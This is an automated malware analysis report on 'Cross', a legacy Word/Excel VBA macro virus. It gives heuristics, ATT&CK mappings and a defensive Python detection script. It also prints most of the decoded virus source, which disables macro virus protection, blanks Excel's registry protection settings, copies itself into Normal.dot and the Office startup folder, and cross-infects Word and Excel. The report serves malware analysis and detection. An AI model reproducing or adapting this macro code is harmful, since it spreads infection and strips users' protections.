Verdict: MALICIOUS
Risk Score: 320

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
The sample is a legacy binary Word document carrying a VBA macro virus whose module is named "Cross" (ClamAV: Doc.Trojan.Exceller-2). Its AutoOpen routine runs under On Error Resume Next, turns off Word's macro virus protection (Options.VirusProtection = False), silences the Normal-template save prompt and alerts, disables several View, Format and Tools menu entries by index, exports its own module to c:\cross.sys, and imports that file into the Normal template and into the active document (which it then re-saves), so the module loads every time Word starts. It also clears the Options6 values under the Office 8.0 (Office 97) Excel registry keys, both for the current user and for new-user defaults, which is where Excel 97 keeps its macro virus protection setting. If no Workbook_.xls is found under the application path, it starts a hidden Excel instance and saves a Workbook_.xls containing the module into Excel's startup path. The Excel side (Auto_Open hooks OnSheetActivate to Exceler) repeats the same export/import into the active workbook and Workbook_.xls and then starts a hidden Word instance, so Word and Excel re-infect each other. Persistence is therefore through the Normal template and the Office startup folder, which is the T1547.001 mapping, not a Run key; no network activity or external payload is visible in the shown portion of the source. A routine mEarthquake is called when Day(Now()) equals a random value, but its body lies outside the shown preview.
Heuristics (7)

- ClamAV: Doc.Trojan.Exceller-2 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Exceller-2
- VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro (Word auto-execution when the document is opened)
- Auto_Open macro (high) [OLE_VBA_AUTO]: Auto_Open macro (Excel auto-execution when the workbook is opened)
- CreateObject call (high) [OLE_VBA_CREATEOBJ]: CreateObject call (here "excel.application" and "word.application", used for cross-infection)
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (For this sample the VBA source was in fact recovered as macros.bas below, so treat this finding as corroborating the AutoOpen finding rather than as evidence of a separate macro.)
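The summary and the heuristics above describe the same triage logic: an auto-execution trigger (AutoOpen, Auto_Open, an event hook) becomes a malicious verdict when it is paired with execution or persistence actions (CreateObject, VBProject export/import, Normal template access, startup-path writes, registry writes, virus protection switched off). The script below is an added example, not the analyzer's own code, that applies that logic to decoded VBA source such as the macros.bas that olevba extracted here. The first three rule tags reuse the report's IDs; the VBA_* tags, the severity weights and the verdict thresholds are choices made for this example. The sample input is a condensed excerpt of the "Cross" module shown in the preview, plus a constructed benign macro.

```python
"""Triage decoded VBA source for auto-exec triggers paired with
persistence/execution actions (the logic behind the report's heuristics)."""
from __future__ import annotations
import re
import sys
from dataclasses import dataclass

# Condensed excerpt of the "Cross" module from the preview (constructed
# test input; in practice pass the source that olevba extracts).
SAMPLE_VBA = r'''
Attribute VB_Name = "Cross"
Public Const ModulName = "Cross"
Sub AutoOpen()
On Error Resume Next
Options.VirusProtection = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
Application.VBE.ActiveVBProject.VBComponents(ModulName).Export "c:\cross.sys"
Set Normal_ = NormalTemplate.VBProject.VBComponents
Normal_.Import "c:\cross.sys"
Set Excelx = CreateObject("excel.application")
Book = Excelx.Application.StartupPath & "\Workbook_.xls"
Workbookx.SaveAs Book
End Sub
Sub Auto_Open()
Application.OnSheetActivate = "Exceler"
End Sub
'''

# A harmless macro (constructed) to show the scanner stays quiet on it.
BENIGN_VBA = r'''
Attribute VB_Name = "Module1"
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

# (tag, severity, pattern, description). OLE_VBA_* tags are the report's
# own IDs; VBA_* tags are names chosen for this example.
RULES = [
    ("OLE_VBA_AUTOOPEN", "high", r"\bSub\s+AutoOpen\b", "Word AutoOpen macro"),
    ("OLE_VBA_AUTO", "high", r"\bSub\s+Auto_Open\b", "Excel Auto_Open macro"),
    ("OLE_VBA_CREATEOBJ", "high", r"\bCreateObject\s*\(", "CreateObject call"),
    ("VBA_EVENT_HOOK", "medium", r"\bOnSheetActivate\s*=", "Runs a routine on sheet activation"),
    ("VBA_VIRUS_PROTECTION_OFF", "high", r"\bVirusProtection\s*=\s*False\b", "Turns off Word macro virus protection"),
    ("VBA_REGISTRY_WRITE", "medium", r'\bPrivateProfileString\s*\(\s*"",\s*"HKEY_', "Registry write via System.PrivateProfileString"),
    ("VBA_VBPROJECT_TAMPER", "high", r"\bVBComponents\b.*\.(Import|Export)\b", "Exports/imports a module through the VBProject object model"),
    ("VBA_NORMAL_TEMPLATE", "high", r"\bNormalTemplate\.VBProject\b", "Reaches into the Normal template's VBA project"),
    ("VBA_OFFICE_STARTUP", "high", r"\bStartupPath\b", "Builds a path inside the Office startup folder"),
]
AUTOEXEC = {"OLE_VBA_AUTOOPEN", "OLE_VBA_AUTO", "VBA_EVENT_HOOK"}
ACTION = {tag for tag, *_ in RULES} - AUTOEXEC
WEIGHT = {"high": 3, "medium": 1}  # example weights, not the report's scoring


@dataclass(frozen=True)
class Finding:
    tag: str
    severity: str
    line_no: int
    line: str


def scan(vba_source: str) -> list[Finding]:
    """One Finding per (rule, line) match. VBA is case-insensitive, so the
    patterns are matched with IGNORECASE."""
    findings = []
    for line_no, line in enumerate(vba_source.splitlines(), start=1):
        for tag, severity, pattern, _desc in RULES:
            if re.search(pattern, line, re.IGNORECASE):
                findings.append(Finding(tag, severity, line_no, line.strip()))
    return findings


def triage(findings: list[Finding]) -> tuple[str, int]:
    """Verdict plus additive score. 'malicious' requires an auto-exec trigger
    AND an execution/persistence action, the same pairing the report's
    p-code heuristic uses (auto-exec token together with execution tokens)."""
    tags = {f.tag for f in findings}
    score = sum(WEIGHT[f.severity] for f in findings)
    if tags & AUTOEXEC and tags & ACTION:
        return "malicious", score
    if tags & AUTOEXEC or tags & ACTION:
        return "suspicious", score
    return "clean", score


if __name__ == "__main__":
    # Usage: python vba_triage.py macros.bas   (defaults to the embedded sample)
    src = SAMPLE_VBA
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            src = fh.read()
    hits = scan(src)
    for f in hits:
        print(f"{f.severity:6} {f.tag:24} line {f.line_no}: {f.line}")
    print("verdict=%s score=%d" % triage(hits))
```

Text-only matching like this is exactly what the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic exists to back up: a document whose source stream has been stripped or damaged shows nothing to this scanner, which is why the analyzer also tokenizes the compiled p-code stream.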
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5635 bytes | 8b448a4ec8f1faec3abaa97d50a4460f634b652536328d699069039ce3d1cb7e | ClamAV: Doc.Trojan.Exceller-2 | unlikely |
Preview script (first 1,000 lines of the extracted script; olevba concatenates the ThisDocument and Cross modules into one file):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Cross"
Public Const ModulName = "Cross"
Public Declare Function SetCursorPos Lib "user32" _
(ByVal x As Long, ByVal y As Long) As Long
Public Declare Function GetCursorPos Lib "user32" _
(lpPoint As Maus) As Long
Public Declare Sub Sleep Lib "kernel32" _
(ByVal dwMilliseconds As Long)
Private Type Maus
Xpos As Long
Ypos As Long
End Type
Sub AutoOpen()
On Error Resume Next
Options.VirusProtection = False
Options.SaveNormalPrompt = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
CommandBars("View").Controls(6).Enabled = False
CommandBars("Format").Controls(12).Enabled = False
CommandBars("Tools").Controls(12).Enabled = False
CommandBars("Tools").Controls(13).Enabled = False
CommandBars("Tools").Controls(14).Enabled = False
Application.DisplayAlerts = wdAlertsNone
Application.VBE.ActiveVBProject.VBComponents(ModulName).Export "c:\cross.sys"
Set Normal_ = NormalTemplate.VBProject.VBComponents
Set Active_ = ActiveDocument.VBProject.VBComponents
For i = 1 To Normal_.Count
If Normal_(i).Name = ModulName Then NormalIns = True
Next i
For j = 1 To Active_.Count
If Active_(j).Name = ModulName Then ActiveIns = True
Next j
If NormalIns = False Then
Normal_.Import "c:\cross.sys"
End If
If ActiveIns = False Then
Active_.Import "c:\cross.sys"
ActiveDocument.SaveAs ActiveDocument.FullName
End If
With Application.FileSearch
.LookIn = Application.Path
.FileName = "Workbook_.xls"
.SearchSubFolders = True
.Execute
If .FoundFiles.Count <> 0 Then ExcelInstalled = True
End With
If ExcelInstalled = False Then
Set Excelx = CreateObject("excel.application")
Excelx.Visible = False
Excelx.CommandBars("Tools").Controls(10).Enabled = False
Excelx.CommandBars("Tools").Controls(12).Enabled = False
Excelx.CommandBars("View").Controls(3).Enabled = False
Excelx.CommandBars("Window").Controls(3).Enabled = False
Excelx.CommandBars("Window").Controls(4).Enabled = False
Book = Excelx.Application.StartupPath & "\Workbook_.xls"
Set Workbookx = Excelx.Workbooks.Add
Workbookx.VBProject.VBComponents.Import "c:\cross.sys"
Excelx.ActiveWindow.Visible = False
Workbookx.SaveAs Book
Excelx.Quit
End If
If Day(Now()) = Int(Rnd * 31) Then mEarthquake
End Sub
Sub Auto_Open()
Application.OnSheetActivate = "Exceler"
End Sub
Sub Exceler()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents(ModulName).Export "c:\cross.sys"
With Application
.DisplayAlerts = False
.ScreenUpdating = False
.CommandBars("Tools").Controls(10).Enabled = False
.CommandBars("Tools").Controls(12).Enabled = False
.CommandBars("View").Controls(3).Enabled = False
.CommandBars("Window").Controls(3).Enabled = False
.CommandBars("Window").Controls(4).Enabled = False
End With
Set Active_ = ActiveWorkbook.VBProject.VBComponents
Book = Application.StartupPath & "\Workbook_.xls"
If UCase(Dir(Book)) <> "WORKBOOK_.XLS" Then
Workbooks.Add.SaveAs FileName:=Book, AddToMru:=False
Workbooks("Workbook_.xls").VBProject.VBComponents.Import "c:\cross.sys"
ActiveWindow.Visible = False
Workbooks("Workbook_.xls").Save
End If
For i = 1 To Active_.Count
If Active_(i).Name = ModulName Then Installed = True
Next
If Installed = False Then
Active_.Import "c:\cross.sys"
ActiveWorkbook.SaveAs FileName:=ActiveWorkbook.FullName, AddToMru:=False
End If
Set Wordx = CreateObject("word.application")
Wordx.Visible = False
```
... (truncated)